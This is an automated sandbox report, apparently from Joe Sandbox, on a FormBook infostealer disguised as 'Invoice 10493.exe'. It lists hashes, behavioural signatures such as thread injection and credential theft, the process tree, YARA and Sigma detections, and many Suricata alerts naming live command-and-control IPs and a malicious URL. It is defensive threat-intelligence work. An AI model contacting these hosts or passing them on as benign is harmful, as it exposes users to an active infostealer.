Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice 10493.exe

Overview

General Information

Sample name:Invoice 10493.exe
Analysis ID:1568482
MD5:ac2d5e685321a9ab4f14fc509d2618c0
SHA1:165b858be3340d458f5850bc8b24b6ed00cbf3e6
SHA256:3716beaffb80d0c1d3baa5ea20b767735f94a290e605ab6d3a4e264cf5efecd5
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64native
  • Invoice 10493.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\Invoice 10493.exe" MD5: AC2D5E685321A9AB4F14FC509D2618C0)
    • svchost.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\Invoice 10493.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • RAVCpl64.exe (PID: 7484 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • winrs.exe (PID: 7968 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)
          • firefox.exe (PID: 7944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3395750472.0000000002F60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3398160795.0000000003790000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1052986194.0000000003950000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.1051362204.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.3398079757.0000000003740000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Invoice 10493.exe", CommandLine: "C:\Users\user\Desktop\Invoice 10493.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice 10493.exe", ParentImage: C:\Users\user\Desktop\Invoice 10493.exe, ParentProcessId: 6668, ParentProcessName: Invoice 10493.exe, ProcessCommandLine: "C:\Users\user\Desktop\Invoice 10493.exe", ProcessId: 3020, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Invoice 10493.exe", CommandLine: "C:\Users\user\Desktop\Invoice 10493.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice 10493.exe", ParentImage: C:\Users\user\Desktop\Invoice 10493.exe, ParentProcessId: 6668, ParentProcessName: Invoice 10493.exe, ProcessCommandLine: "C:\Users\user\Desktop\Invoice 10493.exe", ProcessId: 3020, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T17:11:08.872127+010020507451Malware Command and Control Activity Detected192.168.11.2049710172.67.187.11480TCP
            2024-12-04T17:11:41.810789+010020507451Malware Command and Control Activity Detected192.168.11.204972266.29.132.19480TCP
            2024-12-04T17:11:56.971216+010020507451Malware Command and Control Activity Detected192.168.11.2049726202.92.5.2380TCP
            2024-12-04T17:12:10.565805+010020507451Malware Command and Control Activity Detected192.168.11.2049730194.195.220.4180TCP
            2024-12-04T17:12:25.474501+010020507451Malware Command and Control Activity Detected192.168.11.2049734103.230.159.8680TCP
            2024-12-04T17:12:39.110991+010020507451Malware Command and Control Activity Detected192.168.11.2049738172.67.180.24680TCP
            2024-12-04T17:12:53.821636+010020507451Malware Command and Control Activity Detected192.168.11.2049742118.107.250.10380TCP
            2024-12-04T17:13:07.656658+010020507451Malware Command and Control Activity Detected192.168.11.2049746209.74.77.10980TCP
            2024-12-04T17:13:21.474219+010020507451Malware Command and Control Activity Detected192.168.11.2049750104.21.27.5980TCP
            2024-12-04T17:13:35.465837+010020507451Malware Command and Control Activity Detected192.168.11.2049754194.245.148.18980TCP
            2024-12-04T17:13:48.878875+010020507451Malware Command and Control Activity Detected192.168.11.2049758199.59.243.22780TCP
            2024-12-04T17:14:03.755764+010020507451Malware Command and Control Activity Detected192.168.11.2049762101.35.209.18380TCP
            2024-12-04T17:14:17.430502+010020507451Malware Command and Control Activity Detected192.168.11.2049766162.0.215.3380TCP
            2024-12-04T17:14:32.022684+010020507451Malware Command and Control Activity Detected192.168.11.2049770154.23.184.19480TCP
            2024-12-04T17:14:45.492037+010020507451Malware Command and Control Activity Detected192.168.11.2049774199.59.243.22780TCP
            2024-12-04T17:14:55.640948+010020507451Malware Command and Control Activity Detected192.168.11.2049775172.67.187.11480TCP
            2024-12-04T17:15:17.411748+010020507451Malware Command and Control Activity Detected192.168.11.204977966.29.132.19480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T17:11:08.872127+010028554651A Network Trojan was detected192.168.11.2049710172.67.187.11480TCP
            2024-12-04T17:11:41.810789+010028554651A Network Trojan was detected192.168.11.204972266.29.132.19480TCP
            2024-12-04T17:11:56.971216+010028554651A Network Trojan was detected192.168.11.2049726202.92.5.2380TCP
            2024-12-04T17:12:10.565805+010028554651A Network Trojan was detected192.168.11.2049730194.195.220.4180TCP
            2024-12-04T17:12:25.474501+010028554651A Network Trojan was detected192.168.11.2049734103.230.159.8680TCP
            2024-12-04T17:12:39.110991+010028554651A Network Trojan was detected192.168.11.2049738172.67.180.24680TCP
            2024-12-04T17:12:53.821636+010028554651A Network Trojan was detected192.168.11.2049742118.107.250.10380TCP
            2024-12-04T17:13:07.656658+010028554651A Network Trojan was detected192.168.11.2049746209.74.77.10980TCP
            2024-12-04T17:13:21.474219+010028554651A Network Trojan was detected192.168.11.2049750104.21.27.5980TCP
            2024-12-04T17:13:35.465837+010028554651A Network Trojan was detected192.168.11.2049754194.245.148.18980TCP
            2024-12-04T17:13:48.878875+010028554651A Network Trojan was detected192.168.11.2049758199.59.243.22780TCP
            2024-12-04T17:14:03.755764+010028554651A Network Trojan was detected192.168.11.2049762101.35.209.18380TCP
            2024-12-04T17:14:17.430502+010028554651A Network Trojan was detected192.168.11.2049766162.0.215.3380TCP
            2024-12-04T17:14:32.022684+010028554651A Network Trojan was detected192.168.11.2049770154.23.184.19480TCP
            2024-12-04T17:14:45.492037+010028554651A Network Trojan was detected192.168.11.2049774199.59.243.22780TCP
            2024-12-04T17:14:55.640948+010028554651A Network Trojan was detected192.168.11.2049775172.67.187.11480TCP
            2024-12-04T17:15:17.411748+010028554651A Network Trojan was detected192.168.11.204977966.29.132.19480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T17:11:33.653882+010028554641A Network Trojan was detected192.168.11.204971966.29.132.19480TCP
            2024-12-04T17:11:36.369133+010028554641A Network Trojan was detected192.168.11.204972066.29.132.19480TCP
            2024-12-04T17:11:39.113549+010028554641A Network Trojan was detected192.168.11.204972166.29.132.19480TCP
            2024-12-04T17:11:48.259979+010028554641A Network Trojan was detected192.168.11.2049723202.92.5.2380TCP
            2024-12-04T17:11:51.165066+010028554641A Network Trojan was detected192.168.11.2049724202.92.5.2380TCP
            2024-12-04T17:11:54.069218+010028554641A Network Trojan was detected192.168.11.2049725202.92.5.2380TCP
            2024-12-04T17:12:02.505252+010028554641A Network Trojan was detected192.168.11.2049727194.195.220.4180TCP
            2024-12-04T17:12:05.191161+010028554641A Network Trojan was detected192.168.11.2049728194.195.220.4180TCP
            2024-12-04T17:12:07.878639+010028554641A Network Trojan was detected192.168.11.2049729194.195.220.4180TCP
            2024-12-04T17:12:16.857653+010028554641A Network Trojan was detected192.168.11.2049731103.230.159.8680TCP
            2024-12-04T17:12:19.726532+010028554641A Network Trojan was detected192.168.11.2049732103.230.159.8680TCP
            2024-12-04T17:12:22.602658+010028554641A Network Trojan was detected192.168.11.2049733103.230.159.8680TCP
            2024-12-04T17:12:31.171411+010028554641A Network Trojan was detected192.168.11.2049735172.67.180.24680TCP
            2024-12-04T17:12:33.802453+010028554641A Network Trojan was detected192.168.11.2049736172.67.180.24680TCP
            2024-12-04T17:12:36.501317+010028554641A Network Trojan was detected192.168.11.2049737172.67.180.24680TCP
            2024-12-04T17:12:45.190278+010028554641A Network Trojan was detected192.168.11.2049739118.107.250.10380TCP
            2024-12-04T17:12:48.056114+010028554641A Network Trojan was detected192.168.11.2049740118.107.250.10380TCP
            2024-12-04T17:12:50.952898+010028554641A Network Trojan was detected192.168.11.2049741118.107.250.10380TCP
            2024-12-04T17:12:59.505900+010028554641A Network Trojan was detected192.168.11.2049743209.74.77.10980TCP
            2024-12-04T17:13:02.220963+010028554641A Network Trojan was detected192.168.11.2049744209.74.77.10980TCP
            2024-12-04T17:13:04.939970+010028554641A Network Trojan was detected192.168.11.2049745209.74.77.10980TCP
            2024-12-04T17:13:13.507853+010028554641A Network Trojan was detected192.168.11.2049747104.21.27.5980TCP
            2024-12-04T17:13:16.191238+010028554641A Network Trojan was detected192.168.11.2049748104.21.27.5980TCP
            2024-12-04T17:13:18.797728+010028554641A Network Trojan was detected192.168.11.2049749104.21.27.5980TCP
            2024-12-04T17:13:27.166415+010028554641A Network Trojan was detected192.168.11.2049751194.245.148.18980TCP
            2024-12-04T17:13:29.932724+010028554641A Network Trojan was detected192.168.11.2049752194.245.148.18980TCP
            2024-12-04T17:13:32.701537+010028554641A Network Trojan was detected192.168.11.2049753194.245.148.18980TCP
            2024-12-04T17:13:40.922282+010028554641A Network Trojan was detected192.168.11.2049755199.59.243.22780TCP
            2024-12-04T17:13:43.567374+010028554641A Network Trojan was detected192.168.11.2049756199.59.243.22780TCP
            2024-12-04T17:13:46.224574+010028554641A Network Trojan was detected192.168.11.2049757199.59.243.22780TCP
            2024-12-04T17:13:55.145745+010028554641A Network Trojan was detected192.168.11.2049759101.35.209.18380TCP
            2024-12-04T17:13:58.732692+010028554641A Network Trojan was detected192.168.11.2049760101.35.209.18380TCP
            2024-12-04T17:14:00.882026+010028554641A Network Trojan was detected192.168.11.2049761101.35.209.18380TCP
            2024-12-04T17:14:09.273956+010028554641A Network Trojan was detected192.168.11.2049763162.0.215.3380TCP
            2024-12-04T17:14:11.985600+010028554641A Network Trojan was detected192.168.11.2049764162.0.215.3380TCP
            2024-12-04T17:14:14.716610+010028554641A Network Trojan was detected192.168.11.2049765162.0.215.3380TCP
            2024-12-04T17:14:23.353295+010028554641A Network Trojan was detected192.168.11.2049767154.23.184.19480TCP
            2024-12-04T17:14:26.228835+010028554641A Network Trojan was detected192.168.11.2049768154.23.184.19480TCP
            2024-12-04T17:14:29.160385+010028554641A Network Trojan was detected192.168.11.2049769154.23.184.19480TCP
            2024-12-04T17:14:37.520310+010028554641A Network Trojan was detected192.168.11.2049771199.59.243.22780TCP
            2024-12-04T17:14:40.180661+010028554641A Network Trojan was detected192.168.11.2049772199.59.243.22780TCP
            2024-12-04T17:14:42.836402+010028554641A Network Trojan was detected192.168.11.2049773199.59.243.22780TCP
            2024-12-04T17:15:09.239496+010028554641A Network Trojan was detected192.168.11.204977666.29.132.19480TCP
            2024-12-04T17:15:12.006003+010028554641A Network Trojan was detected192.168.11.204977766.29.132.19480TCP
            2024-12-04T17:15:14.703048+010028554641A Network Trojan was detected192.168.11.204977866.29.132.19480TCP
            2024-12-04T17:15:23.198652+010028554641A Network Trojan was detected192.168.11.2049780202.92.5.2380TCP
            2024-12-04T17:15:26.100914+010028554641A Network Trojan was detected192.168.11.2049781202.92.5.2380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.orbitoasis.online/k6yn/?h7i-=tZtx&IUY=tNpa1p20+8HvGGTFO8FkkeyNbaBnDGg9aQgmgnvjgQBap2YCvQVXfu0lL5fLGicbWcSejDEnKeIqzsVAbPYV9SmH+8E676AUWIvi1rNZuDh4+Pmog8xR0m4=Avira URL Cloud: Label: malware
            Source: http://www.orbitoasis.online/k6yn/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Invoice 10493.exeReversingLabs: Detection: 18%
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.3395750472.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398160795.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1052986194.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1051362204.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398079757.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: Invoice 10493.exeJoe Sandbox ML: detected
            Source: Invoice 10493.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000002.00000003.1020364114.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020564836.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020591220.0000000003024000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Invoice 10493.exe, 00000000.00000003.967661103.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Invoice 10493.exe, 00000000.00000003.967319169.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.969072880.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.971789230.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.000000000372D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1054819932.00000000037F1000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.0000000003ACD000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1051748629.000000000364E000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.00000000039A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Invoice 10493.exe, 00000000.00000003.967661103.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Invoice 10493.exe, 00000000.00000003.967319169.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.969072880.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.971789230.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.000000000372D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1054819932.00000000037F1000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.0000000003ACD000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1051748629.000000000364E000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.00000000039A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: winrs.pdb source: svchost.exe, 00000002.00000003.1020364114.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020564836.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020591220.0000000003024000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49710 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49722 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49727 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49710 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49722 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49729 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49732 -> 103.230.159.86:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49740 -> 118.107.250.103:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49726 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49726 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49754 -> 194.245.148.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49754 -> 194.245.148.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49719 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49721 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49720 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49730 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49746 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 104.21.27.59:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49730 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49733 -> 103.230.159.86:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49735 -> 172.67.180.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49746 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49728 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 194.245.148.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49723 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 194.245.148.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49742 -> 118.107.250.103:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49742 -> 118.107.250.103:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49736 -> 172.67.180.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49731 -> 103.230.159.86:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49758 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49758 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 104.21.27.59:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49725 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49739 -> 118.107.250.103:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49762 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49762 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49750 -> 104.21.27.59:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49750 -> 104.21.27.59:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49737 -> 172.67.180.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49766 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49741 -> 118.107.250.103:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49738 -> 172.67.180.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49766 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49738 -> 172.67.180.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49770 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49770 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 194.245.148.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49774 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49774 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49775 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49779 -> 66.29.132.194:80
